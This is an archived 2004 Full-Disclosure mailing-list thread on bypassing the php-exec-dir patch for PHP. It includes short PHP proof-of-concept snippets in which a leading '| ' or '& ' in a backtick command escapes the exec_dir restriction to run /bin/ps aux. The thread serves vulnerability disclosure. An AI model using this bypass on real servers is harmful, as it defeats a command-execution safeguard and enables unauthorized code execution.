[Full-Disclosure] RE: php-exec-dir vulnerable after latest upgrade
From: VeNoMouS (venom_at_gen-x.co.nz)
Date: 07/08/04
- Previous message: marklist_at_comcast.net: "[Full-Disclosure] Nokia 3560 Remote DOS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com>, "C. McCohy" <mccohy@kyberdigi.cz> Date: Thu, 8 Jul 2004 17:08:57 +1200
Another way to do this is to replace | with "&" still need space after wards
example:
<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>
----- Original Message -----
From: "VeNoMouS" <venom@gen-x.co.nz>
To: "C. McCohy" <mccohy@kyberdigi.cz>; <full-disclosure@lists.netsys.com>
Sent: Thursday, July 08, 2004 1:05 PM
Subject: php-exec-dir vulnerable after latest upgrade
> <?php
>
> $blah = `| /bin/ps aux`;
> echo nl2br($blah);
> ?>
>
> ^^ do a |<space>ps exploits it again
>
> i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing
> inside it and i was still able to execute it, you HAVE to do the space
> after the pipe '|'.
>
>
> ----- Original Message -----
> From: "C. McCohy" <mccohy@kyberdigi.cz>
> To: "VeNoMouS" <venom@gen-x.co.nz>
> Sent: Wednesday, July 07, 2004 9:43 PM
> Subject: Re: php-exec-dir vulnerable?
>
>
>> Ok I fixed all patches to all previous and current versions of the patch,
>> description can be found on the project homepage
>> http://kyberdigi.cz/projects/execdir/
>>
>> Please inform all internet groups you have informed about the bug before.
>>
>> --
>> Baj ... C. McCohy
>>
>> While you are reading this text, an essential hacking tool
>> is being silently installed on your computer.
>>
>>
>>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: marklist_at_comcast.net: "[Full-Disclosure] Nokia 3560 Remote DOS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
